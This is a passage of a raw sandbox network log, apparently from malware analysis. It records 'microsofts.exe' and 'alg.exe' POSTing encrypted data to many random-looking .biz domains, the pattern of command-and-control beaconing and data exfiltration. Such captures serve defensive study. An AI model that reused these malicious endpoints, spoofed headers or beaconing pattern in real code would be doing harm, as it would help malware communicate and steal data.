                                                                                                                                                                                                                                                                                                          Data Ascii: ^j"$7Sq4~8EqnU %fJ)XOe(k|>63"H2VR_}@=}4rb3uQvK9U{XbL-VOpE)WsfE6i(o,n$(A$E8R )o&B573%;&
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.253262997 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:06 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=000f97c7efeaf81b6233129c236085e5|8.46.123.33|1728547746|1728547746|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          99192.168.2.55158813.251.16.15080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.396626949 CEST355OUTPOST /kcrxavatov HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.396652937 CEST828OUTData Raw: c4 87 0f f0 0f e2 85 36 30 03 00 00 86 d1 58 18 5e ed 16 ab 86 a3 40 f4 34 77 29 19 2f 6a 2e 6d f6 95 76 3d 12 cb 2b 61 23 15 07 2a 67 8b 70 79 86 d5 b5 43 86 e2 0d 7e 67 71 dc 13 1a 13 43 17 5c 13 66 85 a8 3a 98 e5 e1 72 86 09 21 2c d3 87 4b e1
                                                                                                                                                                                                                                                                                                          Data Ascii: 60X^@4w)/j.mv=+a#*gpyC~gqC\f:r!,K*H3yjDLILLQJLcOM3>Mc`c0_U1d2IBw-4niXWd}9zJ^M{k`THFG"}<o8<=
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.745182037 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:08 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=d5eabd6830bad68b6146644d2c09ce11|8.46.123.33|1728547748|1728547748|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          100192.168.2.55158918.141.10.107807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.485049963 CEST354OUTPOST /iaiodpshpb HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.485080004 CEST778OUTData Raw: ad b0 be c2 e3 e6 da 7a fe 02 00 00 26 5f 31 16 c8 c1 f7 7b e7 82 4c b2 eb 7d c7 e1 3c 40 41 0e 4d 19 84 40 62 6a 92 41 7e ff cf 77 dc c1 06 44 ec 29 23 0d 57 dd 0e 8b ad 0b f7 a9 bd a6 68 21 d6 42 e6 fe 7b d2 b8 ec 66 49 cd ce 81 bb b0 bc e8 ab
                                                                                                                                                                                                                                                                                                          Data Ascii: z&_1{L}<@AM@bjA~wD)#Wh!B{fI\nN0nHG2 o[\,z|4fJ~Vm,n<JNC-xsy/;e _%}1?/8I?ULlQ1S^BoAqQ`
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.846165895 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:08 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=675ec4d3d8455851936f8630de23865d|8.46.123.33|1728547748|1728547748|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          101192.168.2.55159134.211.97.4580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.766442060 CEST347OUTPOST /ect HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.766467094 CEST828OUTData Raw: a2 23 05 5e c5 f0 3c 21 30 03 00 00 c4 e5 4a c4 16 12 27 c1 d3 9c 66 14 93 7d eb c3 47 5f a2 48 8d e2 fc cb 3f 02 b3 8e 40 c8 8f 2b 4a 21 75 07 37 0c c0 23 3d 1a 98 fc de 56 8c 9e 0a 4c d8 72 73 36 c9 25 4b 39 e9 b1 41 15 c2 9d a8 b5 4f f3 99 73
                                                                                                                                                                                                                                                                                                          Data Ascii: #^<!0J'f}G_H?@+J!u7#=VLrs6%K9AOsAeeJB?msh6'M6czZ~hw*v"[)[/5e:=?D1QS+kn~GZq-N~AFZf:Lc(pMpa+[
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.488140106 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:09 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=835e317df3118e1943a3dbda7a9833d2|8.46.123.33|1728547749|1728547749|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          102192.168.2.55159234.246.200.160807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.049756050 CEST351OUTPOST /exqaqlffu HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.049839020 CEST778OUTData Raw: 31 92 d4 4f c8 8b ec 3c fe 02 00 00 db 2b a2 dc 30 b3 43 1b 82 07 ad 42 49 ae 46 ec 40 09 63 c8 b6 1f c6 3e f7 c1 b8 ae 17 55 c2 2b a8 94 a2 9f 9f d9 49 85 98 18 32 27 9a a3 68 88 05 b4 f8 b4 fc 3c ae 07 15 35 ba a4 e2 1c d7 03 6b 79 60 c3 0c 31
                                                                                                                                                                                                                                                                                                          Data Ascii: 1O<+0CBIF@c>U+I2'h<5ky`1(}<s5DC1J.]7fK'n"D502l6U!6?@BfbfFD>z@t_C<.pCr~\I.yt#P+h


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          103192.168.2.55159334.246.200.160807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.095969915 CEST350OUTPOST /ucjyqfgo HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.096421003 CEST778OUTData Raw: c7 ed cc 30 2f 21 31 3d fe 02 00 00 5b f7 35 26 93 7e 2b c0 e6 a7 63 1b a4 b5 13 f0 3e 48 3c b0 53 49 c5 bd d2 ad 9a 07 c1 2d 44 c2 4d 23 09 59 bd 44 03 33 e3 12 88 3e 8c ec a8 59 e0 74 fb 14 b5 62 b6 21 71 33 41 07 6e 9a 83 d3 0e 7b 10 56 0d 52
                                                                                                                                                                                                                                                                                                          Data Ascii: 0/!1=[5&~+c>H<SI-DM#YD3>Ytb!q3An{VRx<5)18#mPc7)P*U<LW4fZ>-FKYLg16EzH*pVf}.zwJB.OLH!_hK`}5?


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          104192.168.2.55159447.129.31.21280576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.512473106 CEST344OUTPOST /pb HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.512487888 CEST828OUTData Raw: d1 91 02 cc 88 b8 ef 2b 30 03 00 00 9c 58 05 da e6 fb cd e1 f6 8f 39 e8 03 95 3d 5e d8 c2 89 18 c4 da 55 0f 62 3f 0d e5 de 1a 9b c1 b8 dc 41 b5 5d 57 fd 99 d0 e9 b4 31 3a 1d 8c 6b b0 9b df b8 19 90 5e bb 83 c7 86 0a b3 7a f1 0f 7c 82 77 04 1b a1
                                                                                                                                                                                                                                                                                                          Data Ascii: +0X9=^Ub?A]W1:k^z|w'/lnYd%gU.nEu`xr:8}o+'[M_,Q%e=Y5AewwU${rtvkbJdid8{QNY
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.864902020 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:10 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=3fca8c2a2f784fb91c4ea4ddb514f0a0|8.46.123.33|1728547750|1728547750|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          105192.168.2.55159547.129.31.212807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.035675049 CEST347OUTPOST /ha HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.035703897 CEST778OUTData Raw: 86 5b b1 60 ac 73 09 b5 fe 02 00 00 2a 64 f3 e6 59 90 2e bf ce 33 7f d4 05 0f cb df 62 7e 16 e7 1d b8 54 bc 8d c4 65 b2 dd e5 51 db 30 3d 5e 6b 4b cc 39 df 54 0c 61 51 e5 4c 67 72 25 2c c2 57 cc b4 f6 e8 43 73 c4 6b 0c fe 44 f2 e8 bd 0f 5e ff 1b
                                                                                                                                                                                                                                                                                                          Data Ascii: [`s*dY.3b~TeQ0=^kK9TaQLgr%,WCskD^{b0>XaI^vY@jRP9>L:v/=u4UEj/'nmxydzI(?FkTl,hy*gRl*A'~H&'L,=


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          106192.168.2.55159647.129.31.212807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.073084116 CEST357OUTPOST /nqyrhhrsxbrr HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.073107004 CEST778OUTData Raw: eb eb ef 4a b4 f4 ef 3b fe 02 00 00 8b 5c 5c 4c c9 6b fa 6e 90 c3 60 1a 71 7d 21 84 d5 e6 b8 93 f2 0a 6a 17 d7 41 27 94 55 ec ba 08 22 2b de 75 35 8f cb 05 a4 72 22 cd 45 94 37 34 12 5f 4a c2 3a b7 6e 32 ba f8 75 bf 70 92 ac 2a 9b 4e e0 35 ef 20
                                                                                                                                                                                                                                                                                                          Data Ascii: J;\\Lkn`q}!jA'U"+u5r"E74_J:n2up*N5 Z,/4Aw(D0$S27T.D1BSP0:{w65~7&(7SVBX3lv%gi'#z^=KKO>nB;rtAUPC7:Z-sl/v.


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          107192.168.2.5515973.94.10.34807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.519200087 CEST350OUTPOST /sonhfc HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.519222975 CEST778OUTData Raw: 46 61 17 d2 3f 8b 9c 78 fe 02 00 00 e1 4b c7 17 f6 87 64 67 ba 01 20 bb 44 28 e8 27 0a ba e4 8e 72 55 61 3d d1 c7 79 89 88 39 4a af 46 1b c8 ed 43 d8 87 ca 7b 67 51 aa 37 f8 80 2c 85 b1 ff 65 86 aa 8e 1a f4 47 31 d2 fa 2b ed 72 46 12 d6 5a ee 71
                                                                                                                                                                                                                                                                                                          Data Ascii: Fa?xKdg D('rUa=y9JFC{gQ7,eG1+rFZq3EWea`k||V*KZX{Lm)7l/GT7q@\Hw9[:<J'4CY)Dgmo29o(}XXD_j&Zr]($7KN
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.983189106 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:10 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=a7243c0f454fd1c682d6c3a9a648a908|8.46.123.33|1728547750|1728547750|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          108192.168.2.55159813.251.16.15080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.887181997 CEST349OUTPOST /hkdwng HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.887181997 CEST828OUTData Raw: b9 3a 78 6a c2 a0 ff ec 30 03 00 00 df d3 40 f9 cf 99 45 6c 5d e2 3e 6f 6a a4 04 aa 9b 29 14 d4 f5 e4 0c 47 98 c4 c7 d6 59 d2 5f b9 c1 6b b0 fb 6a ec 3c 27 e6 39 0b d9 43 db 82 da 13 1c 73 92 c3 a7 ed f3 bd f3 be c4 8b f0 0b 80 48 e6 2f ce 74 52
                                                                                                                                                                                                                                                                                                          Data Ascii: :xj0@El]>oj)GY_kj<'9CsH/tR/^]u.1dpsHub9/M=\/E:7>GX8|^rQ;]tg5\'?T?`#5O]1,#zs?:s>
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.256587982 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:11 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=4eabcd1a577b91365ebbd19fe671d671|8.46.123.33|1728547751|1728547751|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          109192.168.2.55159935.164.78.200807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.118144035 CEST352OUTPOST /yavfpoeu HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.118206024 CEST778OUTData Raw: 25 72 ea 19 b8 83 99 a1 fe 02 00 00 58 70 a2 5a 02 0c f9 c7 ab 8b 37 3d f6 b9 ef 08 53 9c 99 70 82 53 e0 50 14 72 b1 8b 89 9b 36 d5 94 a1 c6 ff ac 8d 9c 4e 58 20 43 31 ba 3f dc a4 f7 44 32 6b 8e 08 6e ae d7 29 d1 c6 1f 0c 80 30 84 07 86 8a 23 cd
                                                                                                                                                                                                                                                                                                          Data Ascii: %rXpZ7=SpSPr6NX C1?D2kn)0#lymj%Sg6~GkpmHx1@Za+Ie\V7$BW[,]Ffh,;!3TK=SdDj$=oTK5[N\Rch


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          110192.168.2.55160035.164.78.200807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.157978058 CEST360OUTPOST /vjmakoegwejtsrok HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.158030033 CEST778OUTData Raw: bf c9 aa f9 69 70 07 33 fe 02 00 00 7b 06 4e fd e2 c7 0b f6 03 fc 9f 44 ab 98 99 34 0c 6c 64 56 73 1d 48 39 03 85 51 6c a4 de 8d 1c 6a 4a d1 f1 81 96 64 f9 3b ed 54 6e e6 1c 3c 26 59 f2 b9 5c 7c 16 01 6d fb bf 1b 31 a7 0d 7a 8c 47 5a bb b2 cd f1
                                                                                                                                                                                                                                                                                                          Data Ascii: ip3{ND4ldVsH9QljJd;Tn<&Y\|m1zGZ;jGgSZ.GhpjCR|*|N_b&rNHDObwQ9GY{NI{?EwLDVLlwLxp}AgF@M!)Sp


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          111192.168.2.55160118.141.10.107807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.321491957 CEST347OUTPOST /rrlwj HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: whjovd.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.321505070 CEST778OUTData Raw: 08 00 02 6d 4b 04 ce be fe 02 00 00 eb f7 b7 28 7f e7 b1 e7 bb 57 4f 58 2d 6e 25 e5 55 a0 1e 0f 83 f7 20 1d 3a a0 c6 68 93 35 ac ed e6 53 c5 e6 a6 ca 3d 3d ea b2 a1 31 4e 4a 64 6a 8a 0d 30 f8 33 bf f2 95 9e 18 9c b1 3a da 4c b7 9e 47 36 3f a1 48
